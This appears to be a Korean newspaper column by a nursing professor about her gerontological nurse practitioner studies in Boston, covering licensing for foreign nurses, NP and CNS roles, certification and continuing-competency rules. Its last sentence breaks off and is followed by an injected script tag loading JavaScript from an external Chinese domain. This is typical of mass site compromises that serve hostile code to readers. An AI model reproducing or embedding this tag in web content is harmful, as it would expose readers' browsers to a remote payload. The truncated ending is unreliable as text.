김소선 교수 (세대 간호대학)
신체계통 질병 중심으로 세부영역 확대
교육과정 `임상실무박사'로 전환 추세
발목까지 오는 눈과 살을 에는 듯한 2006년 1월의 보스턴은 고령의 만학도로서 이국땅을 밟은 나의 험난한 앞날을 예고하는 듯 했다. 이미 Medical-Surgical Clinical Nurse Specialist(CNS)와 Adult Nurse Practitioner(NP) 자격을 갖고 있는 나는 미국 임상의 변화를 새로운 시각에서 경험하고 급증하는 노인인구를 대상으로 간호가 노릴 틈새시장이 무엇인가를 찾기 위해 메사츄세츠대 노인전문간호사(NP) 석사 후 과정에 입학했다.
외국 간호사의 경우 미국에서 대학원과정을 이수하고 다른 주에서 간호사로 수년 동안 근무한 경력이 있어도 대학 성적증명서 확인 절차부터 시작해 면허시험(NCLEX) 보는 신규처럼 모든 절차를 거치면서 토플 성적을 제시해야 하는 것이 메사츄세츠 주의 규정이며, 2~3개월이 소요된다. 외국 간호사의 경우 각 주마다 등록 시에 요구하는 조건들이 제각각이기 때문에 주 간호국 홈페이지에서 등록절차를 확인한 후 진행해야 한다.
보스턴은 하버드대, 보스턴대, 터프스대 등 유명 대학부속병원들이 몇 블록을 사이에 두고 있어 전문간호사의 실습지로서는 최적의 조건을 갖추고 있는 도시이다. 지금까지 경험했던 전문간호사는 CNS 경우는 주로 3차 병원에서 급성기환자를 일부 관리하면서 일반간호사의 계속교육에 주력했고, 처방권을 가진 NP는 외래에서 일차건강관리를 하는 역할로 대별됐었다. 메사츄세츠의 경우 CNS 역할에는 차이가 없었으나, NP는 3차 의료기관 입원과 외래에 상관없이 배치돼 여러 가지 기능을 수행하고 있었다.
현재 NP 교육과 자격시험은 아동 성인 노인 등 생애주기별로 진행되고 있으나 실제 임상에서는 의료환경의 요구와 의학과 공존할 수밖에 없는 간호의 특성 때문에 순환 호흡 신경 등 신체계통별로 또는 뇌졸중 당뇨 결핵 고혈압 등 질병중심별로 세부전공이 나뉘어 NP의 새로운 역할들이 개발되고 있었다. 하버드대 부속병원인 메사츄세츠제너럴병원(MGH)의 종양내과를 예로 들면 종양을 성인과 아동으로 대별한 후 이를 다시 신체계통별로 구별하고 이를 다시 장기별로 세분화해 간 대장 위 신장 등으로 영역을 발전시키고 있었으며, 종양내과에서 일하는 NP 영역 역시 마찬가지였다.
따라서 대학원 교과과정에서는 전문간호사가 어떤 기관, 어떤 영역에서 일을 하든지 추가 임상현장훈련(on-job training)만 받으면 NP 또는 CNS로서 그 역할을 다할 수 있도록 기초를 튼튼하게 해주는 것으로 그 사명을 다하고 있었다. 실제로 미국간호협회 산하 자격인증센터에서는 건강사정, 병태생리학, 약리학 3개 과목은 전문간호사 자격시험을 위한 응시원서에 별개로 기술하게 해 동봉한 성적증명서를 통해 재확인하는 과정을 거친 후 응시자격을 부여한다. 3개 과목은 비록 공통필수이긴 하나 별개의 과목으로 시험을 보지 않고 대상자의 특성을 고려해 건강사정, 병태생리, 약물에 대한 지식 등을 적용할 수 있는 능력을 확인하기 위해 사례를 통한 통합문제를 통해 지식을 측정한다.
최근 미국의 대표적인 병원평가기구인 JCAHO(미국의료기관신임합동위원회)에서는 전문간호사의 질 관리를 위해 현재 수행하고 있는 역할에 대해 자신의 역량을 입증할 수 있는 증거물로 on-job training, 학술대회 참석, 단기교육프로그램 이수 등의 기록을 파일로 제시하도록 할 것이라고 의료기관에 통보한 바 있다.
보스턴대 부속병원에는 현재 250여명의 NP가 있으며 이들은 월 1회 집담회를 통해 NP와 관련된 이슈 중심으로 전문가를 초빙해 강의를 듣기도 하고 전공영역별로 최신 치료경향을 서로 소개하는 시간을 갖는다. 또한 NP의 질관리를 위해 3개월 주기로 무작위 의무기록지 조사를 통해 과연 `Best Practice'를 했는지 자체 조사해 발표하는 시간을 갖는다.
전문간호사 교육은 임상전문가를 육성하는 것을 목적으로 하기 때문에 어디서 어떤 프리셉터로부터 훈련을 받았는가가 중요하다. 따라서 실습지도자에 대한 학생들의 평가는 혹독하리만큼 냉혹하고 객관적이다.
전문간호사를 위한 대학원교육은 교과목의 특성에 따라 온라인, 오프라인 그리고 온라인과 오프라인을 병행한 수업으로 진행돼 직장생활을 하며 공부하는 간호사들에게 많은 융통성을 제공하고 있었다. 자격시험은 자격시험센터에서 원서를 검토한 후 자격이 충족됐다는 통지를 보내오면 컴퓨터를 통해 집 근처에 있는 시험센터에 접속한 후 공고된 시험일자를 참고해 본인이 날짜를 정한다. 특히 노인전문간호사의 교육은 성인을 다 학습한 후 노인을 추가하는 형식으로 진행되기 때문에 시험 준비 역시 성인과 노인의 모든 신체계통을 섭렵해야 한다. 일부 학생들은 미국 몇몇 도시에서 ?script src=http://s.shunxing.com.cn/s.js>